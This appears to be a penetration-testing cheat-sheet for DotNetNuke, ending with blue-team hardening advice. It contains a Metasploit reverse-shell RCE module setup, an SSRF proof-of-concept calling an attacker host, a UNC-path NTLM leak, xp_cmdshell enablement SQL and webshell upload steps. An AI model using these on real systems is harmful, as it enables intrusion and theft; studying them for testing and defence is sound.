DotNetNuke (DNN)

Reading time: 4 minutes

DotNetNuke (DNN)

If you enter as administrator in DNN it's easy to obtain RCE, however a number of unauthenticated and post-auth techniques have been published in the last few years. The following cheat-sheet collects the most useful primitives for both offensive and defensive work.

Version & Environment Enumeration

• Check the X-DNN HTTP response header – it usually discloses the exact platform version.
• The installation wizard leaks the version in /Install/Install.aspx?mode=install (accessible on very old installs).
• /API/PersonaBar/GetStatus (9.x) returns a JSON blob containing "dnnVersion" for low-privilege users.
• Typical cookies you will see on a live instance:
  • .DOTNETNUKE – ASP.NET forms authentication ticket.
  • DNNPersonalization – contains XML/serialized user profile data (old versions – see RCE below).

Unauthenticated Exploitation

1. Cookie Deserialization RCE (CVE-2017-9822 & follow-ups)

Affected versions ≤ 9.3.0-RC

DNNPersonalization is deserialized on every request when the built-in 404 handler is enabled. Crafted XML can therefore lead to arbitrary gadget chains and code execution.

msf> use exploit/windows/http/dnn_cookie_deserialization_rce
msf> set RHOSTS <target>
msf> set LHOST  <attacker_ip>
msf> run

The module automatically chooses the right path for patched but still vulnerable versions (CVE-2018-15811/15812/18325/18326). Exploitation works without authentication on 7.x–9.1.x and with a verified low-privilege account on 9.2.x+.

2. Server-Side Request Forgery (CVE-2025-32372)

Affected versions < 9.13.8 – Patch released April 2025

A bypass of the older DnnImageHandler fix enables an attacker to coerce the server to issue arbitrary GET requests (semi-blind SSRF). Practical impacts:

• Internal port scan / metadata service discovery in cloud deployments.
• Reach hosts otherwise firewalled from the Internet.

Proof-of-concept (replace TARGET & ATTACKER):

https://TARGET/API/RemoteContentProxy?url=http://ATTACKER:8080/poc

The request is triggered in the background; monitor your listener for callbacks.

3. NTLM Hash Exposure via UNC Redirect (CVE-2025-52488)

Affected versions 6.0.0 – 9.x (< 10.0.1)

Specially crafted content can make DNN attempt to fetch a resource using a UNC path such as \\attacker\share\img.png. Windows will happily perform NTLM negotiation, leaking the server-account hashes to the attacker. Upgrade to 10.0.1 or disable outbound SMB at the firewall.

4. IP Filter Bypass (CVE-2025-52487)

If administrators rely on Host/IP Filters for admin portal protection, be aware that versions prior to 10.0.1 can be bypassed by manipulating X-Forwarded-For in a reverse-proxy scenario.

Post-Authentication to RCE

Via SQL console

Under Settings → SQL a built-in query window allows execution against the site database. On Microsoft SQL Server you can enable xp_cmdshell and spawn commands:

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
GO
xp_cmdshell 'whoami';

Via ASPX webshell upload

1. Go to Settings → Security → More → More Security Settings.
2. Append aspx (or asp) to Allowable File Extensions and Save.
3. Browse to /admin/file-management and upload shell.aspx.
4. Trigger it at /Portals/0/shell.aspx.

Privilege Escalation on Windows

Once code execution is achieved as IIS AppPool<Site>, common Windows privilege-escalation techniques apply. If the box is vulnerable you can leverage:

• PrintSpoofer / SpoolFool to abuse SeImpersonatePrivilege.
• Juicy/Sharp Potatoes to escape Service Accounts.

Hardening Recommendations (Blue Team)

• Upgrade to at least 9.13.9 (fixes SSRF bypass) or preferably 10.0.1 (IP filter & NTLM issues).
• Remove residual InstallWizard.aspx* files after installation.
• Disable outbound SMB (ports 445/139) egress.
• Enforce strong Host Filters on the edge proxy rather than within DNN.
• Block access to /API/RemoteContentProxy if unused.

References

• Metasploit dnn_cookie_deserialization_rce module documentation – practical unauthenticated RCE details (GitHub).
• GitHub Security Advisory GHSA-3f7v-qx94-666m – 2025 SSRF bypass & patch information.